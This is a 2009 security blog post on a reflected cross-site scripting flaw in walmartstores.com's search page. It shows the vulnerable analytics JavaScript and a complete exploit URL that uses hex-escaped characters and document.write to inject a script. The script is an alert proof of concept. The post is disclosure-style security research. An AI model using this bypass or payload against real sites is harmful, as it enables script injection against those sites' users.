This site is soon to be deprecated by http://www.johnleitch.net

Thursday, May 21, 2009

Making The Best Of Things - Walmartstores.com

Despite the quote escaping being broken by the added backslash, the code below may seem secure. Note that the single quote character was left out of the test string; a search containing a single quote or <script> results in a 404 error.
s.pageName = "Search";
s.prop1 = "search";
s.prop7 = "testa.,:;\\"<>()[]{}";
s.prop11 = "0";
s.prop17 = "walmartstores.com";
Because of the extra backslashes necessary to use quotes, calling eval or document.write with a new string literal is not possible. And with the search string converted to lowercase, String.fromCharCode cannot be called. However, nothing is stopping us from setting s.prop7 to anything we want using hex character codes then passing it to eval or document.write. Doing so would look something like this:

http://walmartstores.com/search/?q=\x3C\x73\x63\x72\x69\x70\x74\x3E\x61\x6C\x65\x72\x74\x28\x27\x48\x65\x6C\x6C\x6F\x2C\x20\x57\x6F\x72\x6C\x64\x27\x29\x3B\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E\";document.write(s.prop7);//
Posted by John Leitch at 8:26 PM
Labels: , , , , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)